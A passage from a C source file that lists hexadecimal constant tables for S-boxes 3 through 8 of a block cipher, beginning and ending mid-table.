0xd86a35b8L,0x8cc17b10L,0xe1bf08aeL,0x55693fc5L,0x7680ad13L, /* 175*/ 0x1e6546e8L,0x23b6e7b9L,0xee77a4b2L,0x08ed0533L,0x44fd2895L, /* 180*/ 0xb6393b69L,0x05d6cacfL,0x9819b209L,0xecbbb72fL,0x9a75779cL, /* 185*/ 0xeaec0749L,0x94a65aeeL,0xbdf52dc3L,0xd6a25d04L,0x82008e4eL, /* 190*/ 0xa6de160fL,0x9b036afbL,0x228b3a66L,0x5fb10a70L,0xcc338b58L, /* 195*/ 0x5378a9dfL,0xc908bca9L,0x4959e25bL,0x46909a97L,0x66ae8f6eL, /* 200*/ 0xdd0683e9L,0x65f994b4L,0x6426cda5L,0xc24b8840L,0x32539da0L, /* 205*/ 0x63175650L,0xd0c815ffL,0x50cbc41eL,0xf7c774a3L,0x31b0c231L, /* 210*/ 0x8d0d8116L,0x24bef16cL,0xd555d256L,0xdf47ea8cL,0x6d21eccdL, /* 215*/ 0xa887a012L,0x84542aedL,0xa7b9c1bdL,0x914c1bb1L,0xa0d5b67dL, /* 220*/ 0x438ce937L,0x7030f873L,0x71f6b0c7L,0x574576baL,0xf8bc4541L, /* 225*/ 0x9c61d348L,0x1960579dL,0x17c4daadL,0x96a4cb0bL,0xc193f2f6L, /* 230*/ 0x756eafa2L,0x7c1d2f94L,0xf4fe2b43L,0xcb86e33aL,0xebd4c728L, /* 235*/ 0x9d18ae64L,0x9fe13e30L,0x3ce0f5deL,0xaba1f985L,0xaddc2718L, /* 240*/ 0x68ce6278L,0xd45e241fL,0xa15c82b7L,0x3b2293d4L,0x739edd32L, /* 245*/ 0x674a6bf1L,0x5b5d587fL,0x4772deaaL,0x4a63968fL,0x0be68686L, /* 250*/ 0x513d6426L,0x939a4787L,0xbba89296L,0x4ec20007L,0x818d0d08L, /* 255*/ 0xff64dfd6L /* End of S Box 3 */ }, { /* Start of S Box 4 */ /* 0*/ 0xcb2297cbL,0xdb48a144L,0xa16cbe4bL,0xbbea1d6cL,0x5af6b6b7L, /* 5*/ 0x8a8110b6L,0xf9236ef9L,0xc98f83e6L,0x0f9c65b8L,0x252d4a89L, /* 10*/ 0xa497f068L,0xa5d7ed2dL,0x94c22845L,0x9da1c8c4L,0xe27c2e2eL, /* 15*/ 0x6e8ba2b4L,0xc3dd17fbL,0x498cd482L,0x0dfe6a9fL,0xb0705829L, /* 20*/ 0x9a1e6dc1L,0xf829717cL,0x07bb8e3aL,0xda3c0b02L,0x1af82fc7L, /* 25*/ 0x73b70955L,0x7a04379cL,0x5ee20a28L,0x83712ae5L,0xf4c47c6dL, /* 30*/ 0xdf72ba56L,0xd794858dL,0x8c0cf709L,0x18f0f390L,0xb6c69b35L, /* 35*/ 0xbf2f01dbL,0x2fa74dcaL,0xd0cd9127L,0xbde66cecL,0x3deebd46L, /* 40*/ 0x57c88fc3L,0xcee1406fL,0x0066385aL,0xf3c3444fL,0x3a79d5d5L, /* 45*/ 0x75751eb9L,0x3e7f8185L,0x521c2605L,0xe1aaab6eL,0x38ebb80fL, /* 50*/ 0xbee7e904L,0x61cb9647L,0xea54904eL,0x05ae00e4L,0x2d7ac65fL, /* 55*/ 0x087751a1L,0xdcd82915L,0x0921ee16L,0xdd86d33bL,0xd6bd491aL, /* 60*/ 0x40fbadf0L,0x4232cbd2L,0x33808d10L,0x39098c42L,0x193f3199L, /* 65*/ 0x0bc1e47aL,0x4a82b149L,0x02b65a8aL,0x104cdc8eL,0x24a8f52cL, /* 70*/ 0x685c6077L,0xc79f95c9L,0x1d11fe50L,0xc08dafcdL,0x7b1a9a03L, /* 75*/ 0x1c1f11d8L,0x84250e7fL,0x979db248L,0xebdc0501L,0xb9553395L, /* 80*/ 0xe3c05ea8L,0xb1e51c4cL,0x13b0e681L,0x3b407766L,0x36db3087L, /* 85*/ 0xee17c9fcL,0x6c53ecf2L,0xadccc58fL,0xc427660bL,0xefd5867dL, /* 90*/ 0x9b6d54a5L,0x6ff1aeffL,0x8e787952L,0x9e2bffe0L,0x8761d034L, /* 95*/ 0xe00bdbadL,0xae99a8d3L,0xcc03f6e2L,0xfd0ed807L,0x0e508ae3L, /* 100*/ 0xb74182abL,0x4349245dL,0xd120a465L,0xb246a641L,0xaf3b7ab0L, /* 105*/ 0x2a6488bbL,0x4b3a0d1fL,0xe7c7e58cL,0x3faff2ebL,0x90445ffdL, /* 110*/ 0xcf38c393L,0x995d07e7L,0xf24f1b36L,0x356f6891L,0x6d6ebcbeL, /* 115*/ 0x8da9e262L,0x50fd520eL,0x5bca9e1eL,0x37472cf3L,0x69075057L, /* 120*/ 0x7ec5fdedL,0x0cab892aL,0xfb2412baL,0x1728debfL,0xa000a988L, /* 125*/ 0xd843ce79L,0x042e20ddL,0x4fe8f853L,0x56659c3cL,0x2739d119L, /* 130*/ 0xa78a6120L,0x80960375L,0x70420611L,0x85e09f78L,0xabd17e96L, /* 135*/ 0x1b513eafL,0x1e01eb63L,0x26ad2133L,0xa890c094L,0x7613cf60L, /* 140*/ 0x817e781bL,0xa39113d7L,0xe957fa58L,0x4131b99eL,0x28b1efdaL, /* 145*/ 0x66acfba7L,0xff68944aL,0x77a44fd1L,0x7f331522L,0x59ffb3faL, /* 150*/ 0xa6df935bL,0xfa12d9dfL,0xc6bf6f3fL,0x89520cf6L,0x659edd6aL, /* 155*/ 0x544da739L,0x8b052538L,0x7c30ea21L,0xc2345525L,0x15927fb2L, /* 160*/ 0x144a436bL,0xba107b8bL,0x1219ac97L,0x06730432L,0x31831ab3L, /* 165*/ 0xc55a5c24L,0xaa0fcd3eL,0xe5606be8L,0x5c88f19bL,0x4c0841eeL, /* 170*/ 0x1fe37267L,0x11f9c4f4L,0x9f1b9daeL,0x864e76d0L,0xe637c731L, /* 175*/ 0xd97d23a6L,0x32f53d5cL,0xb8161980L,0x93fa0f84L,0xcaef0870L, /* 180*/ 0x8874487eL,0x98f2cc73L,0x645fb5c6L,0xcd853659L,0x2062470dL, /* 185*/ 0x16ede8e9L,0x6b06dab5L,0x78b43900L,0xfc95b786L,0x5d8e7de1L, /* 190*/ 0x465b5954L,0xfe7ba014L,0xf7d23f7bL,0x92bc8b18L,0x03593592L, /* 195*/ 0x55cef4f7L,0x74b27317L,0x79de1fc2L,0xc8a0bfbdL,0x229398ccL, /* 200*/ 0x62a602ceL,0xbcb94661L,0x5336d206L,0xd2a375feL,0x6a6ab483L, /* 205*/ 0x4702a5a4L,0xa2e9d73dL,0x23a2e0f1L,0x9189140aL,0x581d18dcL, /* 210*/ 0xb39a922bL,0x82356212L,0xd5f432a9L,0xd356c2a3L,0x5f765b4dL, /* 215*/ 0x450afcc8L,0x4415e137L,0xe8ecdfbcL,0xed0de3eaL,0x60d42b13L, /* 220*/ 0xf13df971L,0x71fc5da2L,0xc1455340L,0xf087742fL,0xf55e5751L, /* 225*/ 0x67b3c1f8L,0xac6b8774L,0x7dcfaaacL,0x95983bc0L,0x489bb0b1L, /* 230*/ 0x2c184223L,0x964b6726L,0x2bd3271cL,0x72266472L,0xded64530L, /* 235*/ 0x0a2aa343L,0xd4f716a0L,0xb4dad6d9L,0x2184345eL,0x512c990cL, /* 240*/ 0x29d92d08L,0x2ebe709aL,0x01144c69L,0x34584b9dL,0xe4634ed6L, /* 245*/ 0xecc963cfL,0x3c6984aaL,0x4ed056efL,0x9ca56976L,0x8f3e80d4L, /* 250*/ 0xb5bae7c5L,0x30b5caf5L,0x63f33a64L,0xa9e4bbdeL,0xf6b82298L, /* 255*/ 0x4d673c1dL /* End of S Box 4 */ }, { /* Start of S Box 5 */ /* 0*/ 0x4b4f1121L,0xba183081L,0xc784f41fL,0xd17d0bacL,0x083d2267L, /* 5*/ 0x37b1361eL,0x3581ad05L,0xfda2f6bcL,0x1e892cddL,0xb56d3c3aL, /* 10*/ 0x32140e46L,0x138d8aabL,0xe14773d4L,0x5b0e71dfL,0x5d1fe055L, /* 15*/ 0x3fb991d3L,0xf1f46c71L,0xa325988cL,0x10f66e80L,0xb1006348L, /* 20*/ 0x726a9f60L,0x3b67f8baL,0x4e114ef4L,0x05c52115L,0x4c5ca11cL, /* 25*/ 0x99e1efd8L,0x471b83b3L,0xcbf7e524L,0x43ad82f5L,0x690ca93bL, /* 30*/ 0xfaa61bb2L,0x12a832b5L,0xb734f943L,0xbd22aea7L,0x88fec626L, /* 35*/ 0x5e80c3e7L,0xbe3eaf5eL,0x44617652L,0xa5724475L,0xbb3b9695L, /* 40*/ 0x7f3fee8fL,0x964e7debL,0x518c052dL,0x2a0bbc2bL,0xc2175f5cL, /* 45*/ 0x9a7b3889L,0xa70d8d0cL,0xeaccdd29L,0xcccd6658L,0x34bb25e6L, /* 50*/ 0xb8391090L,0xf651356fL,0x52987c9eL,0x0c16c1cdL,0x8e372d3cL, /* 55*/ 0x2fc6ebbdL,0x6e5da3e3L,0xb0e27239L,0x5f685738L,0x45411786L, /* 60*/ 0x067f65f8L,0x61778b40L,0x81ab2e65L,0x14c8f0f9L,0xa6b7b4ceL, /* 65*/ 0x4036eaecL,0xbf62b00aL,0xecfd5e02L,0x045449a6L,0xb20afd28L, /* 70*/ 0x2166d273L,0x0d13a863L,0x89508756L,0xd51a7530L,0x2d653f7aL, /* 75*/ 0x3cdbdbc3L,0x80c9df4fL,0x3d5812d9L,0x53fbb1f3L,0xc0f185c0L, /* 80*/ 0x7a3c3d7eL,0x68646410L,0x857607a0L,0x1d12622eL,0x97f33466L, /* 85*/ 0xdb4c9917L,0x6469607cL,0x566e043dL,0x79ef1edbL,0x2c05898dL, /* 90*/ 0xc9578e25L,0xcd380101L,0x46e04377L,0x7d1cc7a9L,0x6552b837L, /* 95*/ 0x20192608L,0xb97500c5L,0xed296b44L,0x368648b4L,0x62995cd5L, /* 100*/ 0x82731400L,0xf9aebd8bL,0x3844c0c7L,0x7c2de794L,0x33a1a770L, /* 105*/ 0x8ae528c2L,0x5a2be812L,0x1f8f4a07L,0x2b5ed7caL,0x937eb564L, /* 110*/ 0x6fda7e11L,0xe49b5d6cL,0xb4b3244eL,0x18aa53a4L,0x3a061334L, /* 115*/ 0x4d6067a3L,0x83ba5868L,0x9bdf4dfeL,0x7449f261L,0x709f8450L, /* 120*/ 0xcad133cbL,0xde941c3fL,0xf52ae484L,0x781d77edL,0x7e4395f0L, /* 125*/ 0xae103b59L,0x922331bbL,0x42ce50c8L,0xe6f08153L,0xe7d941d0L, /* 130*/ 0x5028ed6bL,0xb3d2c49bL,0xad4d9c3eL,0xd201fb6eL,0xa45bd5beL, /* 135*/ 0xffcb7f4bL,0x579d7806L,0xf821bb5bL,0x59d592adL,0xd0be0c31L, /* 140*/ 0xd4e3b676L,0x0107165aL,0x0fe939d2L,0x49bcaafdL,0x55ffcfe5L, /* 145*/ 0x2ec1f783L,0xf39a09a5L,0x3eb42772L,0x19b55a5dL,0x024a0679L, /* 150*/ 0x8c83b3f7L,0x8642ba1dL,0xacacd9eaL,0x87d352c4L,0x60931f45L, /* 155*/ 0xa05f97d7L,0x1cecd42cL,0xe2fcc87bL,0xb60f94e2L,0x67a34b0bL, /* 160*/ 0xfcdd40c9L,0x0b150a27L,0xd3ee9e04L,0x582e29e9L,0x4ac22b41L, /* 165*/ 0x6ac4e1b8L,0xbccaa51aL,0x237af30eL,0xebc3b709L,0xc4a59d19L, /* 170*/ 0x284bc98aL,0xe9d41a93L,0x6bfa2018L,0x73b2d651L,0x11f9a2faL, /* 175*/ 0xce09bff1L,0x41a470aaL,0x25888f22L,0x77e754e8L,0xf7330d8eL, /* 180*/ 0x158eab16L,0xc5d68842L,0xc685a6f6L,0xe5b82fdeL,0x09ea3a96L, /* 185*/ 0x6dde1536L,0x4fa919daL,0x26c0be9fL,0x9eed6f69L,0xf05555f2L, /* 190*/ 0xe06fc285L,0x9cd76d23L,0xaf452a92L,0xefc74cb7L,0x9d6b4732L, /* 195*/ 0x8be408eeL,0x22401d0dL,0xee6c459dL,0x7587cb82L,0xe8746862L, /* 200*/ 0x5cbdde87L,0x98794278L,0x31afb94dL,0xc11e0f2fL,0x30e8fc2aL, /* 205*/ 0xcf3261efL,0x1a3023e1L,0xaa2f86cfL,0xf202e24aL,0x8d08dcffL, /* 210*/ 0x764837c6L,0xa26374ccL,0x9f7c3e88L,0x949cc57dL,0xdd26a07fL, /* 215*/ 0xc39efab0L,0xc8f879a1L,0xdce67bb9L,0xf4b0a435L,0x912c9ae0L, /* 220*/ 0xd85603e4L,0x953a9bbfL,0xfb8290d6L,0x0aebcd5fL,0x16206a9aL, /* 225*/ 0x6c787a14L,0xd9a0f16aL,0x29bf4f74L,0x8f8bce91L,0x0e5a9354L, /* 230*/ 0xab038cb1L,0x1b8ad11bL,0xe327ff49L,0x0053da20L,0x90cf51dcL, /* 235*/ 0xda92fe6dL,0x0390ca47L,0xa8958097L,0xa9dc5bafL,0x3931e3c1L, /* 240*/ 0x840446b6L,0x63d069fbL,0xd7460299L,0x7124ecd1L,0x0791e613L, /* 245*/ 0x485918fcL,0xd635d04cL,0xdf96ac33L,0x66f2d303L,0x247056aeL, /* 250*/ 0xa1a7b2a8L,0x27d8cc9cL,0x17b6e998L,0x7bf5590fL,0xfe97f557L, /* 255*/ 0x5471d8a2L /* End of S Box 5 */ }, { /* Start of S Box 6 */ /* 0*/ 0x83a327a1L,0x9f379f51L,0x40a7d007L,0x11307423L,0x224587c1L, /* 5*/ 0xac27d63bL,0x3b7e64eaL,0x2e1cbfa6L,0x09996000L,0x03bc0e2cL, /* 10*/ 0xd4c4478aL,0x4542e0abL,0xfeda26d4L,0xc1d10fcbL,0x8252f596L, /* 15*/ 0x4494eb5cL,0xa362f314L,0xf5ba81fdL,0x75c3a376L,0x4ca214caL, /* 20*/ 0xe164deddL,0x5088fa97L,0x4b0930e0L,0x2fcfb7e8L,0x33a6f4b2L, /* 25*/ 0xc7e94211L,0x2d66c774L,0x43be8baeL,0xc663d445L,0x908eb130L, /* 30*/ 0xf4e3be15L,0x63b9d566L,0x529396b5L,0x1e1be743L,0x4d5ff63fL, /* 35*/ 0x985e4a83L,0x71ab9df7L,0xc516c6f5L,0x85c19ab4L,0x1f4daee4L, /* 40*/ 0xf2973431L,0xb713dc5eL,0x3f2e159aL,0xc824da16L,0x06bf376aL, /* 45*/ 0xb2fe23ecL,0xe39b1c22L,0xf1eecb5fL,0x08e82d52L,0x565686c2L, /* 50*/ 0xab0aea93L,0xfd47219fL,0xebdbabd7L,0x2404a185L,0x8c7312b9L, /* 55*/ 0xa8f2d828L,0x0c8902daL,0x65b42b63L,0xc0bbef62L,0x4e3e4cefL, /* 60*/ 0x788f8018L,0xee1ebab7L,0x93928f9dL,0x683d2903L,0xd3b60689L, /* 65*/ 0xafcb0ddcL,0x88a4c47aL,0xf6dd9c3dL,0x7ea5fca0L,0x8a6d7244L, /* 70*/ 0xbe11f120L,0x04ff91b8L,0x8d2dc8c0L,0x27f97fdbL,0x7f9e1f47L, /* 75*/ 0x1734f0c7L,0x26f3ed8eL,0x0df8f2bfL,0xb0833d9eL,0xe420a4e5L, /* 80*/ 0xa423cae6L,0x95616772L,0x9ae6c049L,0x075941f2L,0xd8e12812L, /* 85*/ 0x000f6f4fL,0x3c0d6b05L,0x6cef921cL,0xb82bc264L,0x396cb008L, /* 90*/ 0x5d608a6fL,0x6d7782c8L,0x186550aaL,0x6b6fec09L,0x28e70b13L, /* 95*/ 0x57ce5688L,0xecd3af84L,0x23335a95L,0x91f40cd2L,0x7b6a3b26L, /* 100*/ 0xbd32b3b6L,0x3754a6fbL,0x8ed088f0L,0xf867e87cL,0x20851746L, /* 105*/ 0x6410f9c6L,0x35380442L,0xc2ca10a7L,0x1adea27fL,0x76bddd79L, /* 110*/ 0x92742cf4L,0x0e98f7eeL,0x164e931dL,0xb9c835b3L,0x69060a99L, /* 115*/ 0xb44c531eL,0xfa7b66feL,0xc98a5b53L,0x7d95aae9L,0x302f467bL, /* 120*/ 0x74b811deL,0xf3866abdL,0xb5b3d32dL,0xfc3157a4L,0xd251fe19L, /* 125*/ 0x0b5d8eacL,0xda71ffd5L,0x47ea05a3L,0x05c6a9e1L,0xca0ee958L, /* 130*/ 0x9939034dL,0x25dc5edfL,0x79083cb1L,0x86768450L,0xcf757d6dL, /* 135*/ 0x5972b6bcL,0xa78d59c9L,0xc4ad8d41L,0x2a362ad3L,0xd1179991L, /* 140*/ 0x601407ffL,0xdcf50917L,0x587069d0L,0xe0821ed6L,0xdbb59427L, /* 145*/ 0x73911a4bL,0x7c904fc3L,0x844afb92L,0x6f8c955dL,0xe8c0c5bbL, /* 150*/ 0xb67ab987L,0xa529d96cL,0xf91f7181L,0x618b1b06L,0xe718bb0cL, /* 155*/ 0x8bd7615bL,0xd5a93a59L,0x54aef81bL,0x772136e3L,0xce44fd9cL, /* 160*/ 0x10cda57eL,0x87d66e0bL,0x3d798967L,0x1b2c1804L,0x3edfbd68L, /* 165*/ 0x15f6e62bL,0xef68b854L,0x3896db35L,0x12b7b5e2L,0xcb489029L, /* 170*/ 0x9e4f98a5L,0x62eb77a8L,0x217c24a2L,0x964152f6L,0x49b2080aL, /* 175*/ 0x53d23ee7L,0x48fb6d69L,0x1903d190L,0x9449e494L,0xbf6e7886L, /* 180*/ 0xfb356cfaL,0x3a261365L,0x424bc1ebL,0xa1192570L,0x019ca782L, /* 185*/ 0x9d3f7e0eL,0x9c127575L,0xedf02039L,0xad57bcceL,0x5c153277L, /* 190*/ 0x81a84540L,0xbcaa7356L,0xccd59b60L,0xa62a629bL,0xa25ccd10L, /* 195*/ 0x2b5b65cfL,0x1c535832L,0x55fd4e3aL,0x31d9790dL,0xf06bc37dL, /* 200*/ 0x4afc1d71L,0xaeed5533L,0xba461634L,0xbb694b78L,0x5f3a5c73L, /* 205*/ 0x6a3c764aL,0x8fb0cca9L,0xf725684cL,0x4fe5382fL,0x1d0163afL, /* 210*/ 0x5aa07a8fL,0xe205a8edL,0xc30bad38L,0xff22cf1fL,0x72432e2eL, /* 215*/ 0x32c2518bL,0x3487ce4eL,0x7ae0ac02L,0x709fa098L,0x0a3b395aL, /* 220*/ 0x5b4043f8L,0xa9e48c36L,0x149a8521L,0xd07dee6bL,0x46acd2f3L, /* 225*/ 0x8958dffcL,0xb3a1223cL,0xb11d31c4L,0xcd7f4d3eL,0x0f28e3adL, /* 230*/ 0xe5b100beL,0xaac54824L,0xe9c9d7baL,0x9bd47001L,0x80f149b0L, /* 235*/ 0x66022f0fL,0x020c4048L,0x6efa192aL,0x67073f8dL,0x13ec7bf9L, /* 240*/ 0x3655011aL,0xe6afe157L,0xd9845f6eL,0xdecc4425L,0x511ae2ccL, /* 245*/ 0xdf81b4d8L,0xd7809e55L,0xd6d883d9L,0x2cc7978cL,0x5e787cc5L, /* 250*/ 0xdd0033d1L,0xa050c937L,0x97f75dcdL,0x299de580L,0x41e2b261L, /* 255*/ 0xea5a54f1L /* End of S Box 6 */ }, { /* Start of S Box 7 */ /* 0*/ 0x7e672590L,0xbea513bbL,0x2c906fe6L,0x86029c2bL,0x55dc4f74L, /* 5*/ 0x0553398eL,0x63e09647L,0xcafd0babL,0x264c37dfL,0x8272210fL, /* 10*/ 0x67afa669L,0x12d98a5fL,0x8cab23c4L,0x75c68bd1L,0xc3370470L, /* 15*/ 0x33f37f4eL,0x283992ffL,0xe73a3a67L,0x1032f283L,0xf5ad9fc2L, /* 20*/ 0x963f0c5dL,0x664fbc45L,0x202ba41cL,0xc7c02d80L,0x54731e84L, /* 25*/ 0x8a1085f5L,0x601d80fbL,0x2f968e55L,0x35e96812L,0xe45a8f78L, /* 30*/ 0xbd7de662L,0x3b6e6eadL,0x8097c5efL,0x070b6781L,0xb1e508f3L, /* 35*/ 0x24e4fae3L,0xb81a7805L,0xec0fc918L,0x43c8774bL,0x9b2512a9L, /* 40*/ 0x2b05ad04L,0x32c2536fL,0xedf236e0L,0x8bc4b0cfL,0xbaceb837L, /* 45*/ 0x4535b289L,0x0d0e94c3L,0xa5a371d0L,0xad695a58L,0x39e3437dL, /* 50*/ 0x9186bffcL,0x21038c3bL,0x0aa9dff9L,0x5d1f06ceL,0x62def8a4L, /* 55*/ 0xf740a2b4L,0xa2575868L,0x682683c1L,0xdbb30facL,0x61fe1928L, /* 60*/ 0x468a6511L,0xc61cd5f4L,0xe54d9800L,0x6b98d7f7L,0x8418b6a5L, /* 65*/ 0x5f09a5d2L,0x90b4e80bL,0x49b2c852L,0x69f11c77L,0x17412b7eL, /* 70*/ 0x7f6fc0edL,0x56838dccL,0x6e9546a2L,0xd0758619L,0x087b9b9aL, /* 75*/ 0xd231a01dL,0xaf46d415L,0x097060fdL,0xd920f657L,0x882d3f9fL, /* 80*/ 0x3ae7c3c9L,0xe8a00d9bL,0x4fe67ebeL,0x2ef80eb2L,0xc1916b0cL, /* 85*/ 0xf4dffea0L,0xb97eb3ebL,0xfdff84ddL,0xff8b14f1L,0xe96b0572L, /* 90*/ 0xf64b508cL,0xae220a6eL,0x4423ae5aL,0xc2bece5eL,0xde27567cL, /* 95*/ 0xfc935c63L,0x47075573L,0xe65b27f0L,0xe121fd22L,0xf2668753L, /* 100*/ 0x2debf5d7L,0x8347e08dL,0xac5eda03L,0x2a7cebe9L,0x3fe8d92eL, /* 105*/ 0x23542fe4L,0x1fa7bd50L,0xcf9b4102L,0x9d0dba39L,0x9cb8902aL, /* 110*/ 0xa7249d8bL,0x0f6d667aL,0x5ebfa9ecL,0x6a594df2L,0x79600938L, /* 115*/ 0x023b7591L,0xea2c79c8L,0xc99d07eaL,0x64cb5ee1L,0x1a9cab3dL, /* 120*/ 0x76db9527L,0xc08e012fL,0x3dfb481aL,0x872f22e7L,0x2948d15cL, /* 125*/ 0xa4782c79L,0x6f50d232L,0x78f0728aL,0x5a87aab1L,0xc4e2c19cL, /* 130*/ 0xee767387L,0x1b2a1864L,0x7b8d10d3L,0xd1713161L,0x0eeac456L, /* 135*/ 0xd8799e06L,0xb645b548L,0x4043cb65L,0xa874fb29L,0x4b12d030L, /* 140*/ 0x7d687413L,0x18ef9a1fL,0xd7631d4cL,0x5829c7daL,0xcdfa30faL, /* 145*/ 0xc5084bb0L,0x92cd20e2L,0xd4c16940L,0x03283ec0L,0xa917813fL, /* 150*/ 0x9a587d01L,0x70041f8fL,0xdc6ab1dcL,0xddaee3d5L,0x31829742L, /* 155*/ 0x198c022dL,0x1c9eafcbL,0x5bbc6c49L,0xd3d3293aL,0x16d50007L, /* 160*/ 0x04bb8820L,0x3c5c2a41L,0x37ee7af8L,0x8eb04025L,0x9313ecbaL, /* 165*/ 0xbffc4799L,0x8955a744L,0xef85d633L,0x504499a7L,0xa6ca6a86L, /* 170*/ 0xbb3d3297L,0xb34a8236L,0x6dccbe4fL,0x06143394L,0xce19fc7bL, /* 175*/ 0xccc3c6c6L,0xe36254aeL,0x77b7eda1L,0xa133dd9eL,0xebf9356aL, /* 180*/ 0x513ccf88L,0xe2a1b417L,0x972ee5bdL,0x853824cdL,0x5752f4eeL, /* 185*/ 0x6c1142e8L,0x3ea4f309L,0xb2b5934aL,0xdfd628aaL,0x59acea3eL, /* 190*/ 0xa01eb92cL,0x389964bcL,0xda305dd4L,0x019a59b7L,0x11d2ca93L, /* 195*/ 0xfaa6d3b9L,0x4e772ecaL,0x72651776L,0xfb4e5b0eL,0xa38f91a8L, /* 200*/ 0x1d0663b5L,0x30f4f192L,0xb50051b6L,0xb716ccb3L,0x4abd1b59L, /* 205*/ 0x146c5f26L,0xf134e2deL,0x00f67c6cL,0xb0e1b795L,0x98aa4ec7L, /* 210*/ 0x0cc73b34L,0x654276a3L,0x8d1ba871L,0x740a5216L,0xe0d01a23L, /* 215*/ 0x9ed161d6L,0x9f36a324L,0x993ebb7fL,0xfeb9491bL,0x365ddcdbL, /* 220*/ 0x810cffc5L,0x71ec0382L,0x2249e7bfL,0x48817046L,0xf3a24a5bL, /* 225*/ 0x4288e4d9L,0x0bf5c243L,0x257fe151L,0x95b64c0dL,0x4164f066L, /* 230*/ 0xaaf7db08L,0x73b1119dL,0x8f9f7bb8L,0xd6844596L,0xf07a34a6L, /* 235*/ 0x53943d0aL,0xf9dd166dL,0x7a8957afL,0xf8ba3ce5L,0x27c9621eL, /* 240*/ 0x5cdae910L,0xc8518998L,0x941538feL,0x136115d8L,0xaba8443cL, /* 245*/ 0x4d01f931L,0x34edf760L,0xb45f266bL,0xd5d4de14L,0x52d8ac35L, /* 250*/ 0x15cfd885L,0xcbc5cd21L,0x4cd76d4dL,0x7c80ef54L,0xbc92ee75L, /* 255*/ 0x1e56a1f6L /* End of S Box 7 */ }, { /* Start of S Box 8 */ /* 0*/ 0xbaa20b6cL,0x9ffbad26L,0xe1f7d738L,0x794aec8dL,0xc9e9cf3cL, /* 5*/ 0x8a9a7846L,0xc57c4685L,0xb9a92fedL,0x29cb141fL,0x52f9ddb7L, /* 10*/ 0xf68ba6bcL,0x19ccc020L,0x4f584aaaL,0x3bf6a596L,0x003b7cf7L, /* 15*/ 0x54f0ce9aL,0xa7ec4303L,0x46cf0077L,0x78d33aa1L,0x215247d9L, /* 20*/ 0x74bcdf91L,0x08381d30L,0xdac43e40L,0x64872531L,0x0beffe5fL, /* 25*/ 0xb317f457L,0xaebb12daL,0xd5d0d67bL,0x7d75c6b4L,0x42a6d241L, /* 30*/ 0x1502d0a9L,0x3fd97fffL,0xc6c3ed28L,0x81868d0aL,0x92628bc5L, /* 35*/ 0x86679544L,0xfd1867afL,0x5ca3ea61L,0x568d5578L,0x4a2d71f4L, /* 40*/ 0x43c9d549L,0x8d95de2bL,0x6e5c74a0L,0x9120ffc7L,0x0d05d14aL, /* 45*/ 0xa93049d3L,0xbfa80e17L,0xf4096810L,0x043f5ef5L,0xa673b4f1L, /* 50*/ 0x6d780298L,0xa4847783L,0x5ee726fbL,0x9934c281L,0x220a588cL, /* 55*/ 0x384e240fL,0x933d5c69L,0x39e5ef47L,0x26e8b8f3L,0x4c1c6212L, /* 60*/ 0x8040f75dL,0x074b7093L,0x6625a8d7L,0x36298945L,0x76285088L, /* 65*/ 0x651d37c3L,0x24f5274dL,0xdbca3dabL,0x186b7ee1L,0xd80f8182L, /* 70*/ 0x14210c89L,0x943a3075L,0x4e6e11c4L,0x4d7e6badL,0xf05064c8L, /* 75*/ 0x025dcd97L,0x4bc10302L,0x7cede572L,0x8f90a970L,0xab88eebaL, /* 80*/ 0xb5998029L,0x5124d839L,0xb0eeb6a3L,0x89ddabdcL,0xe8074d76L, /* 85*/ 0xa1465223L,0x32518cf2L,0x9d39d4ebL,0xc0d84524L,0xe35e6ea8L, /* 90*/ 0x7abf3804L,0x113e2348L,0x9ae6069dL,0xb4dfdabbL,0xa8c5313fL, /* 95*/ 0x23ea3f79L,0x530e36a2L,0xa5fd228bL,0x95d1d350L,0x2b14cc09L, /* 100*/ 0x40042956L,0x879d05ccL,0x2064b9caL,0xacaca40eL,0xb29c846eL, /* 105*/ 0x9676c9e3L,0x752b7b8aL,0x7be2bcc2L,0x6bd58f5eL,0xd48f4c32L, /* 110*/ 0x606835e4L,0x9cd7c364L,0x2c269b7aL,0x3a0d079cL,0x73b683feL, /* 115*/ 0x45374f1eL,0x10afa242L,0x577f8666L,0xddaa10f6L,0xf34f561cL, /* 120*/ 0x3d355d6bL,0xe47048aeL,0xaa13c492L,0x050344fdL,0x2aab5151L, /* 125*/ 0xf5b26ae5L,0xed919a59L,0x5ac67900L,0xf1cde380L,0x0c79a11bL, /* 130*/ 0x351533fcL,0xcd4d8e36L,0x1f856005L,0x690b9fddL,0xe736dccfL, /* 135*/ 0x1d47bf6aL,0x7f66c72aL,0x85f21b7fL,0x983cbdb6L,0x01ebbebfL, /* 140*/ 0x035f3b99L,0xeb111f34L,0x28cefdc6L,0x5bfc9ecdL,0xf22eacb0L, /* 145*/ 0x9e41cbb2L,0xe0f8327cL,0x82e3e26fL,0xfc43fc86L,0xd0ba66dfL, /* 150*/ 0x489ef2a7L,0xd9e0c81dL,0x68690d52L,0xcc451367L,0xc2232e16L, /* 155*/ 0xe95a7335L,0x0fdae19bL,0xff5b962cL,0x97596527L,0xc46db333L, /* 160*/ 0x3ed4c562L,0xc14c9d9eL,0x5d6faa21L,0x638e940dL,0xf9316d58L, /* 165*/ 0x47b3b0eaL,0x30ffcad2L,0xce1bba7dL,0x1e6108e6L,0x2e1ea33dL, /* 170*/ 0x507bf05bL,0xfafef94bL,0xd17de8e2L,0x5598b214L,0x1663f813L, /* 175*/ 0x17d25a2dL,0xeefa5ff9L,0x582f4e37L,0x12128773L,0xfef17ab8L, /* 180*/ 0x06005322L,0xbb32bbc9L,0x8c898508L,0x592c15f0L,0xd38a4054L, /* 185*/ 0x4957b7d6L,0xd2b891dbL,0x37bd2d3eL,0x34ad20cbL,0x622288e9L, /* 190*/ 0x2dc7345aL,0xafb416c0L,0x1cf459b1L,0xdc7739faL,0x0a711a25L, /* 195*/ 0x13e18a0cL,0x5f72af4cL,0x6ac8db11L,0xbe53c18eL,0x1aa569b9L, /* 200*/ 0xef551ea4L,0xa02a429fL,0xbd16e790L,0x7eb9171aL,0x77d693d8L, /* 205*/ 0x8e06993aL,0x9bde7560L,0xe5801987L,0xc37a09beL,0xb8db76acL, /* 210*/ 0xe2087294L,0x6c81616dL,0xb7f30fe7L,0xbc9b82bdL,0xfba4e4d4L, /* 215*/ 0xc7b1012fL,0xa20c043bL,0xde9febd0L,0x2f9297ceL,0xe610aef8L, /* 220*/ 0x70b06f19L,0xc86ae00bL,0x0e01988fL,0x41192ae0L,0x448c1cb5L, /* 225*/ 0xadbe92eeL,0x7293a007L,0x1b54b5b3L,0xd61f63d1L,0xeae40a74L, /* 230*/ 